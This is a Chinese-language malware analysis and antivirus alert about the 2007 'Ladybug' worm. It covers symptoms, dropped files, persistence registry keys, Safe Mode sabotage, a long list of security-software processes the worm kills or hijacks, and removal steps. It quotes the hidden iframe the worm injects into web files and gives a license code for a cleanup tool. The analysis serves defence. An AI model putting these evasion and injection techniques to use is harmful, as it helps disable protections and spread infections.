2007年12月18日，金山毒霸全球反病毒监测中心发布圣诞期间紧急病毒预警，行为极度恶劣的“瓢虫”病毒新变种（Win32.Troj.Downloader.vb.237568）预计在圣诞节前后大面积发作，感染电脑内将爬满“瓢虫”，广大用户需高度警惕。金山毒霸反病毒专家戴光剑表示，“瓢虫病毒集熊猫烧香、AV终结者等年内重大病毒破坏性于一身，虽然目前病毒本身还有些缺陷，但随着新变种的不断出现，其破坏程度不容小觑。”

病毒介绍

症状

病毒分析和删除

解决办法

预防(一.病毒信息 二.病毒行为：)

病毒介绍

12月18日，金山毒霸全球反病毒监测中心发布圣诞期间紧急病毒预警，行为极度恶劣的“瓢虫”病毒新变种（Win32.Troj.Downloader.vb.237568）预计在圣诞节前后大面积发作，感染电脑内将爬满“瓢虫”，广大用户需高度警惕。

金山毒霸反病毒专家戴光剑表示，“瓢虫病毒集熊猫烧香、AV终结者等年内重大病毒破坏性于一身，虽然目前病毒本身还有些缺陷，但随着新变种的不断出现，其破坏程度不容小觑。”

据了解，“瓢虫”病毒与熊猫烧香类似，感染性极强，用户电脑一旦感染该病毒，除系统盘，被感染后的exe文件图标将变成绿色的“小飘虫”；同时，用户电脑内的浏览器、任务管理器、文件夹选项、系统时间等项目都将遭受破坏。戴光剑指出，这是一个感染性极强的病毒，病毒运行后，用户电脑将表现出五大“中毒”症状：

1、电脑运行速度立刻变慢，杀毒软件无法正常使用；

2 、 系统时间被修改为2030年，使依赖系统时间的软件全部失效；

3、浏览器首页被篡改。当用户打开浏览器，会发现首页被修改为一个伪装的“百度”，由于该网址同样具有正常的搜索功能，所以极具容易迷惑性；

4、“任务管理器”和“文件夹选项”遭屏蔽。如果用户想使用“任务管理器”和“文件夹选项”来查看是谁在系统中捣鬼，会发现这两个功能都被病毒屏蔽掉；而当用户试图打开注册表时，会弹出一个对话框，提示“注册表编辑已被管理员停用”；再仔细检查，会发现连System32文件夹都不见了，病毒已经把自己隐藏得非常深；

5、硬盘、软驱、光驱自动共享。用户打开“我的电脑”时，可发现机器的硬盘以及软驱、光驱全部已经自动设置成共享状态，并且这种共享还被病毒锁死，无法改回正确的设置。这样，只要有谁愿意，都可以一览无遗地浏览用户电脑中的资料。

金山毒霸反病毒工程师分析指出，病毒潜入用户电脑系统后，会在系统盘中释放出6个病毒文件，分别为%windows%\\system32\\目录下的AUTORUN.INF、netshare.cmd、Avpser.cmd、Taskeep.vbs、SDGames.exe，以及%windows%下的system.ini。除此而外，病毒还在全部磁盘的根目录下生成AUTORUN.INF、Recycleds.url、SDGames.exe、Windows.url、新建文件夹.url等文件。

根据瓢虫病毒的传播特点，金山毒霸反病毒应急中心及时进行了病毒库更新，升级毒霸到2007年12月18的病毒库即可查杀以上病毒；如未安装金山毒霸，可以免费下载最新版金山毒霸2008或使用金山毒霸在线杀毒来防止病毒入侵。拨打金山毒霸反病毒急救电话010—82331816，反病毒专家将为您提供帮助。

年终岁末是病毒的高发期，金山毒霸反病毒工程师建议广大用户：1、最好安装专业的杀毒软件进行全面监控，防范日益增多的病毒。用户在安装反病毒软件之后，应将一些主要监控经常打开（如邮件监控、内存监控等）、经常进行升级、遇到问题要上报，这样才能真正保障计算机的安全。2、由于玩网络游戏、利用QQ聊天的用户数量逐渐增加，所以各类盗号木马必将随之增多，建议用户一定要养成良好的网络使用习惯，及时升级杀毒软件，开启防火墙以及实时监控等功能，切断病毒传播的途径，不给病毒以可乘之机。

症状

截杀"小瓢虫"病毒

据了解，“瓢虫”病毒与熊猫烧香类似，感染性极强，用户电脑一旦感染该病毒，除系统盘，被感染后的exe文件图标将变成绿色的“小飘虫”；同时，用户电脑内的浏览器、任务管理器、文件夹选项、系统时间等项目都将遭受破坏。戴光剑指出，这是一个感染性极强的病毒，病毒运行后，用户电脑将表现出五大“中毒”症状： 1、电脑运行速度立刻变慢，杀毒软件无法正常使用；

2、系统时间被修改为2030年，使依赖系统时间的软件全部失效；

3、浏览器首页被篡改。当用户打开浏览器，会发现首页被修改为一个伪装的“百度”，由于该网址同样具有正常的搜索功能，所以极具容易迷惑性；

4、“任务管理器”和“文件夹选项”遭屏蔽。如果用户想使用“任务管理器”和“文件夹选项”来查看是谁在系统中捣鬼，会发现这两个功能都被病毒屏蔽掉；而当用户试图打开注册表时，会弹出一个对话狂，提示“注册表编辑已被管理员停用”；再仔细检查，会发现连System32文件夹都不见了，病毒已经把自己隐藏得非常深；

5、硬盘、软驱、光驱自动共享。用户打开“我的电脑”时，可发现机器的硬盘以及软驱、光驱全部已经自动设置成共享状态，并且这种共享还被病毒锁死，无法改回正确的设置。这样，只要有谁愿意，都可以一览无遗地浏览用户电脑中的资料。

瓢虫病毒

金山毒霸反病毒工程师分析指出，病毒潜入用户电脑系统后，会在系统盘中释放出6个病毒文件，分别为%windows%\\system32\\目录下的AUTORUN.INF、netshare.cmd、Avpser.cmd、Taskeep.vbs、SDGames.exe，以及%windows%下的system.ini。除此而外，病毒还在全部磁盘的根目录下生成AUTORUN.INF、Recycleds.url、SDGames.exe、Windows.url、新建文件夹.url等文件。

根据瓢虫病毒的传播特点，金山毒霸反病毒应急中心及时进行了病毒库更新，升级毒霸到2007年12月18的病毒库即可查杀以上病毒；如未安装金山毒霸，可以免费下载最新版金山毒霸2008或使用金山毒霸在线杀毒来防止病毒入侵。拨打金山毒霸反病毒急救电话010—82331816，反病毒专家将为您提供帮助。

年终岁末是病毒的高发期，金山毒霸反病毒工程师建议广大用户：1、最好安装专业的杀毒软件进行全面监控，防范日益增多的病毒。用户在安装反病毒软件之后，应将一些主要监控经常打开（如邮件监控、内存监控等）、经常进行升级、遇到问题要上报，这样才能真正保障计算机的安全。2、由于玩网络游戏、利用QQ聊天的用户数量逐渐增加，所以各类盗号木马必将随之增多，建议用户一定要养成良好的网络使用习惯，及时升级杀毒软件，开启防火墙以及实时监控等功能，切断病毒传播的途径，不给病毒以可乘之机。

病毒分析和删除

主要表现

病毒样本来自卡饭，病毒行为恶劣，主要表现为：

1.攻击杀毒软件之后进行IFEO映像劫持

2.感染htm等网页文件

3.感染或覆盖exe等可执行文件

4.破坏安全模式

5.破坏显示隐藏文件 文件夹选项等

6.修改系统时间并锁定时间

7.可通过U盘等移动存储传播

8.关闭Windows防火墙等服务并打开许多危险服务，并使得用户磁盘被共享

9.后台添加账户并设定管理员权限

10.修改某些文件关联

下面为具体分析

File: SDGames.exe

Size: 59282 bytes

File Version: 3.02

Modified: 2007年12月6日, 17:56:32

MD5: FC334FFCF5AFF3CA8235705D61F62990

SHA1: 4DFFE9E9BB666A13CC646EBA4371BDF4AFFB49BC

CRC32: 1DD096C2

1.病毒运行后，释放如下文件或副本

%systemroot%\\system32\\SDGames.exe

%systemroot%\\system32\\Taskeep.vbs

%systemroot%\\system32\\Avpser.cmd

%systemroot%\\system32\etshare.cmd

%systemroot%\\system32\\AUTORUN.INF

在每个磁盘分区释放SDGames.exe和AUTORUN.INF 达到通过U盘传播的目的（首先通过rd命令删除 autorun.inf文件夹 使得某些通过此种方法免疫U盘病毒的方式失效）

并且在每个分区释放Windows.url，新建文件夹.url，Recycleds.url指向该分区根目录下的SDGames.exe

诱使用户点击

2.修改

reg和txt文件关联指向%systemroot%\\system32\\SDGames.exe

3.删除

HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318}

破坏安全模式

4.创建自启动项目

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows]

<load><%systemroot%\\system32\\SDGames.exe> [SDGame]

<run><%systemroot%\\system32\\SDGames.exe> [SDGame]

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]

<Winstary><%systemroot%\\system32\\SDGames.exe> [SDGame]

5.破坏系统的一些功能

禁用cmd:HKCU\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD

破坏显示隐藏文件：HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden

HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue

使得文件扩展名无法显示：

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt

隐藏控制面板：

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oControlPanel

禁用注册表编辑器

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistrytools

禁用任务管理器

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr

修改IE主页为：http://www.*.

修改IE默认页为：wangma

隐藏文件夹选项

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oFolderOptions

6.关闭如下服务并将其启动类型设为禁用

Alg

sharedaccess

wuauserv

7.开启下列服务并将其启动类型设为自动

Terminal Services

winmgmt

lanmanserver

8.%systemroot%\\system32\etshare.cmd将用户的所有磁盘设为共享

9.添加一个名为guest的账户，

并将其设置为管理员权限

10.攻击反病毒软件

，利用Avpser.cmd强制结束一些杀毒软件进程

RavMonD.exe

RavStub.exe

Anti*

AgentSvr*

CCenter*

Rsaupd*

SmartUp*

FileDsty*

RegClean*

360tray*

360safe*

kabaload*

safelive*

KASTask*

kpFW32*

kpFW32X*

KvXP_1*

KVMonXP_1*

KvReport*

KvXP*

KVMonXP*

nter*

TrojDie*

Trojan*

KvNative*

Virus*

Filewall*

Kaspersky*

JiangMin*

RavMonD*

RavStub*

RavTask*

adam*

cSet*

PFWliveUpdate*

mmqczj*

Trojanwall*

Ras.exe

runiep.exe

avp.exe

PFW.exe

rising*

ikaka*

.duba*

kingsoft*

木马*

社区*

aswBoot*

MainCon*

Regs*

AVP*

Task*

regedit*

Ras*

srgui*

norton*

avp*

fire*

spy*

bullguard*

PersFw*

KAV*

ZONEALARM*

SAFEWEB*

OUTPOST*

ESAFE*

clear*

BLACKICE*

360safe.exe

Shadowservice.exe

v3webnt.exe

v3sd32.exe

v3monsvc.exe

sysmonnt.exe

hkcmd.exe

DNTUS26.EXE

AhnSD.exe

CTFMON.EXE

MonsysNT.exe

awrem32.exe

WINAW32.EXE

PNTIOMON.exe

avgw.exe

avgcc32.exe

PROmon.exe

PNTIOMON.exe

MagicSet.exe

MainCon.exe

TrCleaner.exe

WmNetPro.exe

修复*

保护*

11.映像劫持杀毒软件和一些常用工具

360rpt.exe

360Safe.exe

360tray.EXE

adam.exe

AgentSvr.exe

AppSvc32.exe

autoruns.exe

avgrssvc.exe

AvMonitor.exe

avp.exe

CCenter.exe

ccSvcHst.exe

FileDsty.exe

FTCleanerShell.exe

HijackThis.exe

IceSword.exe

iparmo.exe

Iparmor.exe

isPwdSvc.exe

kabaload.exe

KaScrScn.SCR

KASMain.exe

KASTask.exe

KAV32.exe

KAVDX.exe

KAVPFW.exe

KAVSetup.exe

KAVStart.exe

KISLnchr.exe

KMailMon.exe

KMFilter.exe

Knod32kui.exe

KPFW32.exe

KPFW32X.exe

KPFWSvc.exe

KRegEx.exe

KsLoader.exe

KVCenter.kxp

KvDetect.exe

KvfwMcl.exe

KVMonXP.kxp

KVMonXP_1.kxp

kvol.exe

kvolself.exe

KvReport.kxp

KVScan.kxp

KVSrvXP.exe

KVStub.kxp

kvupload.exe

kvwsc.exe

KvXP.kxp

KvXP_1.kxp

KWatch9x.exe

KWatchX.exe

loaddll.exe

MagicSet.exe

MainCon.exe

mcconsol.exe

mmqczj.exe

mmsk.exe

msconfig.exe

NAVSetup.exe

nod32krn.exe

PFW.exe

PFWLiveUpdate.exe

QHSET.exe

QQ.exe

Ras.exe

Rav.exe

RavMon.exe

RavMonD.exe

RavStub.exe

RavTask.exe

RegClean.exe

rfwcfg.exe

RfwMain.exe

rfwProxy.exe

rfwsrv.exe

Rsaupd.exe

runiep.exe

safelive.exe

scan32.exe

Shadowservice.exe

shcfg32.exe

SmartUp.exe

SREng.exe

srgui.exe

symlcsvc.exe

SysSafe.exe

TrojanDetector.exe

Trojanwall.exe

TrojDie.kxp

UIHost.exe

UmxAgent.exe

UmxAttachment.exe

UmxCfg.exe

UmxFwHlp.exe

UmxPol.exe

UpLive.EXE.exe

WoptiClean.exe

zxsweep.exe

12.遍历感染非系统分区的exe文件（覆盖方式）

13.遍历感染非系统分区的jsp asp php htm html hta文件

在其末尾加入<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://*." name="Myframe"

align="center" border="0">的代码

14.修改系统时间的年份为2030年，并禁止用户修改时间

15.隐藏系统文件夹

解决办法

：

下载sreng：http://download.files/sreng2.zip

Icesword：http://mail.~jfpan/download/IceSword122cn.zip

1.解压缩Icesword

把Icesword改名为1.exe运行

进程中 找到SDGames.exe 右击它 结束进程

然后点击 Icesword左下角的 文件 按钮

找到如下文件并删除

%systemroot%\\system32\\SDGames.exe

%systemroot%\\system32\\Taskeep.vbs

%systemroot%\\system32\\Avpser.cmd

%systemroot%\\system32\etshare.cmd

%systemroot%\\system32\\AUTORUN.INF

以及各个分区下面的

SDGames.exe,AUTORUN.INF,Windows.url，新建文件夹.url，Recycleds.url

2.运行sreng

（由于时间已经被改为2030年 所以sreng会弹出过期提示，不用担心，输入下面的授权码即可使用）

用户名：teyqiu

授权号：2-6-1-2-9-0-2-7-5-4-1-1-8-5-4-3-1-4-0-9-0-1-3-5-5-6(去掉“-”就是了)

打开sreng后 点击 系统修复－文件关联－修复

系统修复－Windows Shell/IE －全选－修复

高级修复－修复安全模式

3.还是sreng中

启动项目 注册表 删除如下项目

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows]

<load><%systemroot%\\system32\\SDGames.exe> [SDGame]

<run><%systemroot%\\system32\\SDGames.exe> [SDGame]

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]

<Winstary><%systemroot%\\system32\\SDGames.exe> [SDGame]

并删除所有红色的IFEO项目

启动项目 System.ini

删除Windows节点

4.取消磁盘共享

开始 运行 输入cmd 输入如下命令

net share c /delete

net share d /delete

...

以此类推 分别取消所有磁盘分区的共享

5.显示系统文件夹

开始 运行 输入cmd 输入如下命令

attrib -h %systemroot%\\system32

6.修复受感染的htm等网页文件

推荐使用CSI的iframkill

预防

这个病毒看起来象熊猫烧香和AV终结者的结合体，阳光以前曾给过一个详细的分析。如果这个病毒把感染做的完美些（现在病毒还不是真正意义上的感染，是用病毒体完全覆盖正常EXE)，会不会造成和李俊版熊猫烧香一样的效果呢，完全有可能。

以下是关于该病毒的详细分析报告：

一.病毒信息

病毒名：Win32.Troj.Serwer.yx

病毒中文名称：小瓢虫

二.病毒行为：

这是一个感染型病毒，把会计算机上的系统时间改为2030年，在系统盘的system32文件夹下释放多个病毒文件。

在计算机上的每个盘下生成SDGames.exe和Autorun.inf两个文件，以达到通过双击该盘时病毒可以运行起来。

在每个盘下生成三个Url文件，都指向该盘下的SDGame.exe文件，三个Url文件具有迷惑性的图标。可以查看这三个URL的属性，会发现都指向c:\\sdgame.exe。

通过添加注册表启动项以达到开机时病毒能运行起来，通过修改注册表破坏系统安全模式，禁用大部分系统功能：包括，禁用任务管理器，禁用控制面板，禁止修改系统配置，锁定主页，禁用注册表编辑器等。

映像劫持了大量软件，被劫持的软件包括“杀毒软件”，“系统检测工具”，“QQ”，（连QQ都不让用，这病毒够BT)

感染计算机上的exe文件，感染方式为覆盖数据。(除系统盘外，其它盘的EXE都被替换为小瓢虫图标)

感染计算机上的hta，html，htm，jsp，php，asp后缀的文件，插入网页代码.(除系统盘外，这一点和熊猫烧香的传播方式相同，有可能会造成网站大面积挂马）

把计算机上的所有盘设为所有人完全共享，（这是尼姆达病毒最常用的手段，当然，目的就是在局域网中大面积传播了。）

病毒运行后释放以下文件：

%systemroot%\\system32\\Taskeep.vbs

%systemroot%\\system32\\SDGames.exe

%systemroot%\\system32\\Avpser.cmd

%systemroot%\\system32\etshare.cmd

%systemroot%\\system32\\AUTORUN.INF

Taskeep.vbs的作用是运行起病毒进程

netshare.cmd的作用是打开本机的共享

Avpser.cmd用于结束计算机上的大量杀毒软件、安全检测软件，常见杀毒软件都在被攻击之列。

病毒在计算机上的每个盘下生成SDGame.exe和Autorun.inf，并生成Recycleds.url，Windows.url，新建文件夹.url三个文件，诱使用户双击。这三个文件都指向该盘下的SDGame.exe文件。(Recycleds.url的图标为“回收站”，其余两个图标为“文件夹图标”)

病毒创建注册表启动项，添加服务；

把计算机上为以下后缀名的文件插入代码:(除系统盘外）

".hta"

".html"

".htm"

".php"

".asp"

".jsp"

插入的代码：

感染计算机上的exe文件，感染方式为覆盖数据.(除系统盘，被感染后的exe文件图标为绿色的小飘虫)

修改计算机上的reg和txt文件关联指向"%systemroot%\\system32\\SDGames.exe"

把计算机上的系统时间改为2030年，中国木马制作者的惯用手法。

通过修改注册表的方式破坏安全模式。

禁用cmd：

HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD

破坏显示隐藏文件：

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue

使得文件扩展名无法显示：

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt

隐藏控制面板：

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oControlPanel

禁用注册表编辑器:

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistrytools

禁用任务管理器：

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr

修改IE主页为： http://www.zhidaobaidu.

隐藏文件夹选项：

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oFolderOptions

映像劫持常用安全软件，这次连杀毒软件的命令行查毒都没放过。